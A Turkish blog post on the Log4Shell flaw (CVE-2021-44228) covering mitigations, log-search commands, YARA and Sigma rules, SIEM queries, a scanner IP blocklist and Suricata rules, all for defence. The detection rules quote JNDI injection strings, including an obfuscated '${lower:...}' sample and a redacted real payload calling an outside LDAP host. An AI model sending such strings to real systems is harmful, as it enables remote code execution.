Nedir Bu Log4j RCE (Log4Shell)

Nedir Bu Log4j RCE (Log4Shell)

Hepinize merhabalar yeni makalemde sizlere son birkaç gündür çok fazla konuşulan bir zafiyetten bahsedeceğim. Umarım faydalı olur. 🙂

Remote Code Execution (RCE) CVE-2021-44228 kodu ile yayınlanan zafiyet, kötü niyetli kişilerin Apache Log4j bulunan sistemleri Remote Code Execution (RCE) ile ele geçirmesine imkan tanımaktadır. Uzaktan kod çalıştırma olarak tabir edilen RCE, kötü niyetli kişilerin sistemde tam erişim yetkisi elde etmesini sağlamaktadır.

Log4j Nedir?

Log4j Apache Software Foundation ın geliştirmiş olduğu bir loglama kütüphanesidir.  Java programcıları tarafından kullanılmaktadır. Log4j isteğe göre seviye bazlı loglama yapar ve Java kullanan bir çok  uygulama içerisinde yer almakta ve kullanılmaktadır.

Bu zafiyetin diğer zafiyetlerden önemi ise Log4j’nin bir kütüphane olmasıdır. Bu nedenle bir çok uygulama ve program bu zafiyetten etkilenmektedir.

Örneğin;

Bir uygulamada çıkan bir zafiyet sadece bu uygulamayı etkiliyorsa bu uygulama üzerinde bir  yama yapılabilir ve zafiyetin sömürülmesinin önüne geçilir. Ancak Log4j bir kütüphane olduğu için birden fazla uygulamayı etkileyerek çok geniş bir saldırı yüzeyi olmasına olanak tanımaktadır. Bu nedenle bir çok kurum ve kuruluş hatta hackerler çok fazla uygulama üzerinde deneme yanılma yaparak zafiyeti bulmaya çalışmaktadır.

 

Bu zafiyetten etkilenen ürünler ve sistemler

Yukarıda bahsettiğim üzere Log4j bir kütüphane olduğu için bu zafiyet şu uygulamayı etkilemektedir denilememektedir. Bu nedenle bir uygulamanın bu zafiyetten etkilenip etkilenmediğini anlamak için Log4j kütüphanesi kullanıyor mu sorusuna  cevap aramak doğru olacaktır.

Ancak Java kullanan bir uygulama varsa yüksek ihtimalle Log4j  de kullanılmaktadır. Bu nedenle  Java kullanan uygulamalar kontrol edilmeli ve gerekli yama işlemler uygulanmalıdır.

 • Apple
 • Steam
 • Twitter
 • Baidu
 • Tesla
 • Linkedln
 • Amazon
 • ElasticSearch
 • Google
 • Palo Alto
 • Dell
 • IBM Qradar SIEM
 • VMWare
 • Apache Tomcat …

Bir çok ürün ve üretici bu zafiyetten etkilenmiştir. Bunun için kaynaklar kısmındaki bağlantıdan her saat başı güncellenen listeye ulaşabilirsiniz.

Alınabilecek Önlemler

Zafiyetin çıkmasından sonra HTTP/HTTPS üzerinden user-agent ile payloadların gönderildiği ve bu şekilde çok yoğun denemelerin yapıldığı görünmektedir. Güvenlik duvarlarında saldırının etkilerini azaltabilmek için LDAP,DNS ve RMI portlarına erişimlerin engellenmesi gerekmektedir. Saldırganlar saldırı sonuçlarını buradan dönen başarılı ve başarısız olduğunu bu protokoller ile paket göndermeye çalışmaktadır.

Bu zafiyetten korunmanın birden fazla yolu bulunmaktadır. İlk yolu sürüm güncellemesi yapmaktır. Eğer sürüm güncellemesi yapılanmıyorsa aşağıdaki adımlar uygulanmalıdır.

 1.  Log4j V2.10 ve öncesinin JVM konfigürasyonunda aşağıdaki parametreyi true olarak set etmesi gerekmektedir.
log4j.formatMsgNoLookups=true
 • 2- Apache için güncelleme Log4j v2.15.0
 • 3- Aşağıdaki gibi bir komut satırı ile JndiLookup sınıfını pat üzerinden kaldırabilirsiniz.
zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

 

Hangi sistemlerde Log4j kullanıldığının tespiti

Linux log kaynaklarının bulunduğu dizinleri taramak için şu aracı kullanabilirsiniz.

 • https://github.com/Neo23x0/log4shell-detector

Linux sistemler üzerinde /var/log altında sıkıştırılmamış dosyalar için aşağıdaki komut satırı ile arama yapılabilmektedir.

sudo egrep -i -r ‘\$\{jndi:(ldap[s]?|rmi|dns):/[^\n]+’ /var/log

Linux sistemler üzerinde log altında sıkıştırılmış dosyalar için aşağıdaki komut satırları ile arama yapılabilmektedir.

sudo find /var/log -name \*.gz -print0 | xargs -0 zgrep -E -i ‘\$\{jndi:(ldap[s]?|rmi|dns):/[^\n]+'
sudo find /var/log/ -name “*.gz” -type f -exec sh -c “zcat {} | sed -e ‘s/\${lower://’g | tr -d ‘}’ | egrep -i ‘jndi:(ldap[s]?|rmi|dns):'” \;

 

Windows  sistemlerde ise aşağıdaki komut satırı kullanılmaktadır.

gci ‘C:\’ -rec -force -include *.jar -ea 0 | foreach {select-string “JndiLookup.class” $_} | select -exp Path

 

Yara Kuralı

rule EXPL_Log4j_CVE_2021_44228_Dec21_Soft {
  meta:
   description = "Detects indicators in server logs that indicate an exploitation attempt of CVE-2021-44228"
   author = "Florian Roth"
   reference = "https://twitter.com/h113sdx/status/1469010902183661568?s=20"
   date = "2021-12-10"
   score = 60
  strings:
   $x1 = "${jndi:ldap:/"
   $x2 = "${jndi:rmi:/"
   $x3 = "${jndi:ldaps:/"
   $x4 = "${jndi:dns:/"
  condition:
   1 of them
}

rule EXPL_Log4j_CVE_2021_44228_Dec21_Hard {
  meta:
   description = "Detects indicators in server logs that indicate the exploitation of CVE-2021-44228"
   author = "Florian Roth"
   reference = "https://twitter.com/h113sdx/status/1469010902183661568?s=20"
   date = "2021-12-10"
   score = 80
  strings:
   $x1 = /\$\{jndi:(ldap|ldaps|rmi|dns):\/[\/]?[a-z-\.0-9]{3,120}:[0-9]{2,5}\/[a-zA-Z\.]{1,32}\}/
   $fp1r = /(ldap|rmi|ldaps|dns):\/[\/]?(127\.0\.0\.1|192\.168\.|172\.[1-3][0-9]\.|10\.)/
  condition:
   $x1 and not 1 of ($fp*)
}

rule SUSP_Base64_Encoded_Exploit_Indicators_Dec21 {
  meta:
   description = "Detects base64 encoded strings found in payloads of exploits against log4j CVE-2021-44228"
   author = "Florian Roth"
   reference = "https://twitter.com/Reelix/status/1469327487243071493"
   date = "2021-12-10"
   score = 70
  strings:
   /* curl -s */
   $sa1 = "Y3VybCAtcy"
   $sa2 = "N1cmwgLXMg"
   $sa3 = "jdXJsIC1zI"
   /* |wget -q -O- */
   $sb1 = "fHdnZXQgLXEgLU8tI"
   $sb2 = "x3Z2V0IC1xIC1PLS"
   $sb3 = "8d2dldCAtcSAtTy0g"
  condition:
   1 of ($sa*) and 1 of ($sb*)
}

 

SIEM Kullanılarak Tespit Etme

SIEM de sadece  index=* ${jndi:*} şeklinde bir arama ile sonuca ulaşılabilmektedir.

title: Log4j RCE [CVE-2021-44228] Exploitation Detection Patterns (via webserver)
status: experimental
description: Detects possible Log4j exploitation patterns in user agent header on webserver logs.
author: SOC Prime Team
tags:
  - attack.initial_access
  - attack.t1190
references:
  - https://www.randori.com/blog/cve-2021-44228/
  - https://blog.cloudflare.com/cve-2021-44228-log4j-rce-0-day-mitigation/
  - https://www-cnblogs-com.translate.goog/yyhuni/p/15088134.html?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-US
  - https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b
  - https://www.lunasec.io/docs/blog/log4j-zero-day/
  - https://www.reddit.com/r/programming/comments/rcxehp/rce_0day_exploit_found_in_log4j_a_popular_java/
  - https://github.com/YfryTchsGD/Log4jAttackSurface
  - https://gist.github.com/byt3bl33d3r/46661bc206d323e6770907d259e009b6
  - https://github.com/tangxiaofeng7/apache-log4j-poc
  - https://github.com/apache/logging-log4j2/pull/608
  - https://www.tenable.com/blog/cve-2021-44228-proof-of-concept-for-critical-apache-log4j-remote-code-execution-vulnerability
  - https://www.crowdstrike.com/blog/log4j2-vulnerability-analysis-and-mitigation-recommendations/
  - https://blog.qualys.com/vulnerabilities-threat-research/2021/12/10/apache-log4j2-zero-day-exploited-in-the-wild-log4shell
  - https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/
  - https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-44228/
  - https://blog.cloudflare.com/actual-cve-2021-44228-payloads-captured-in-the-wild/
logsource:
 category: webserver
detection:
 selection_base_ua:
  c-useragent|contains:
   - 'jndi' #real attack example: ${jndi:ldap://45.XXX.205.XXX:12344/Basic/Command/Base64/XXX==}
 selection_vars_ua:
  c-useragent|contains:
   - 'ldap'
   - 'rmi'
   - 'ldaps'
   - 'dns'
   - 'lower' # ${jndi:${lower:l}${lower:d}a${lower:p}://loc${upper:a}lhost:1389/rce}
   - 'upper'
 selection_base_url: #https://blog.cloudflare.com/cve-2021-44228-log4j-rce-0-day-mitigation/
  c-uri|contains:
   - 'jndi' 
 selection_vars_url:
  c-uri|contains:
   - 'ldap'
   - 'rmi'
   - 'ldaps'
   - 'dns'
   - 'lower' # ${jndi:${lower:l}${lower:d}a${lower:p}://loc${upper:a}lhost:1389/rce}
   - 'upper'
 selection_base_body: #https://blog.cloudflare.com/cve-2021-44228-log4j-rce-0-day-mitigation/
  post-body|contains:
   - 'jndi' 
 selection_vars_body:
  post-body|contains:
   - 'ldap'
   - 'rmi'
   - 'ldaps'
   - 'dns'
   - 'lower' # ${jndi:${lower:l}${lower:d}a${lower:p}://loc${upper:a}lhost:1389/rce}
   - 'upper'
 condition: (selection_base_ua and selection_vars_ua) or (selection_base_url and selection_vars_url) or (selection_base_body and selection_vars_body)
falsepositives:
 - Unknown
level: high

 

Elasticsearch

(((user_agent.original:*jndi* AND user_agent.original:(*ldap* OR *rmi* OR *ldaps* OR *dns* OR *lower* OR *upper*)) OR (url.original:*jndi* AND url.original:(*ldap* OR *rmi* OR *ldaps* OR *dns* OR *lower* OR *upper*))) OR (post-body:*jndi* AND post-body:(*ldap* OR *rmi* OR *ldaps* OR *dns* OR *lower* OR *upper*)))

 

Splunk SIEM

((((UserAgent=="*jndi*") (c-useragent="*ldap*" OR c-useragent="*rmi*" OR c-useragent="*ldaps*" OR c-useragent="*dns*" OR c-useragent="*lower*" OR c-useragent="*upper*")) OR ((c-uri="*jndi*") (c-uri="*ldap*" OR c-uri="*rmi*" OR c-uri="*ldaps*" OR c-uri="*dns*" OR c-uri="*lower*" OR c-uri="*upper*"))) OR ((post-body="*jndi*") (post-body="*ldap*" OR post-body="*rmi*" OR post-body="*ldaps*" OR post-body="*dns*" OR post-body="*lower*" OR post-body="*upper*")))

 

IBM QRadar SIEM

SELECT UTF8(payload) from events where ((("user_agent" ilike '%jndi%') and ("user_agent" ilike '%ldap%' or "user_agent" ilike '%rmi%' or "user_agent" ilike '%ldaps%' or "user_agent" ilike '%dns%' or "user_agent" ilike '%lower%' or "user_agent" ilike '%upper%')) or (("URL" ilike '%jndi%') and ("URL" ilike '%ldap%' or "URL" ilike '%rmi%' or "URL" ilike '%ldaps%' or "URL" ilike '%dns%' or "URL" ilike '%lower%' or "URL" ilike '%upper%'))) or (("post-body" ilike '%jndi%') and ("post-body" ilike '%ldap%' or "post-body" ilike '%rmi%' or "post-body" ilike '%ldaps%' or "post-body" ilike '%dns%' or "post-body" ilike '%lower%' or "post-body" ilike '%upper%'))

 

Arcsight SIEM

((((((deviceCustomString1 CONTAINS "*jndi*") AND (deviceCustomString1 CONTAINS "*ldap*" OR deviceCustomString1 CONTAINS "*rmi*" OR deviceCustomString1 CONTAINS "*ldaps*" OR deviceCustomString1 CONTAINS "*dns*" OR deviceCustomString1 CONTAINS "*lower*" OR deviceCustomString1 CONTAINS "*upper*")) OR (requestUrl CONTAINS "*jndi*" AND requestUrl CONTAINS "*ldap*" OR requestUrl CONTAINS "*rmi*" OR requestUrl CONTAINS "*ldaps*" OR requestUrl CONTAINS "*dns*" OR requestUrl CONTAINS "*lower*" OR requestUrl CONTAINS "*upper*"))) OR ((deviceCustomString1 CONTAINS "*jndi*") AND (deviceCustomString1 CONTAINS "*ldap*" OR deviceCustomString1 CONTAINS "*rmi*" OR deviceCustomString1 CONTAINS "*ldaps*" OR deviceCustomString1 CONTAINS "*dns*" OR deviceCustomString1 CONTAINS "*lower*" OR deviceCustomString1 CONTAINS "*upper*"))))

 

Güvenlik Duvarı Üzerinden Erişim Engeli Yapılacak IP Adresleri

Aktif olarak tarama yaptığı belirlenen IP adresleri şu şekildedir. Bu IP adresleri güvenlik duvarı üzerinde engellenenler listesine eklenmelidir. Burada bir çok IP adresi yer almaktadır ve sürekli güncellenmektedir. Bu IP adresi listesine şuradan erişebilirsiniz.

https://gist.github.com/gnremy/c546c7911d5f876f263309d7161a7217#file-cve-2021-44228_ips-csv

 • 167.99.88.151
 • 167.99.36.245
 • 167.71.1.144
 • 165.232.80.22
 • 165.227.32.109
 • 164.92.254.33
 • 164.52.53.163
 • 159.65.59.77…

Burayı çok fazla uzatmak istemediğim için çok fazla IP adresi vermedim.

Suricata&Snort IDS Kuralları

alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http ldap) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|ldap|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034647; rev:1; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)

 

alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http rmi) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|rmi|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034648; rev:1; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp ldap) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|ldap|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034649; rev:1; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp rmi) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|rmi|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034650; rev:1; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp rmi) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|rmi|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034652; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp ldap) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|ldap|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034651; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp dns) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|dns|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034653; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp dns) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|dns|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034654; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http dns) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|dns|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034655; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp ldaps) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|ldaps|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034656; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp ldaps) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|ldaps|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034657; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http ldaps) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|ldaps|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034658; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
Kaynaklar:
 • https://gist.github.com/gnremy/c546c7911d5f876f263309d7161a7217
 • https://github.com/Neo23x0/log4shell-detector
 • https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b
 • https://github.com/search?q=CVE-2021-44228&ref=simplesearch
 • https://rules.emergingthreatspro.com/open/suricata-5.0/rules/emerging-exploit.rules

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir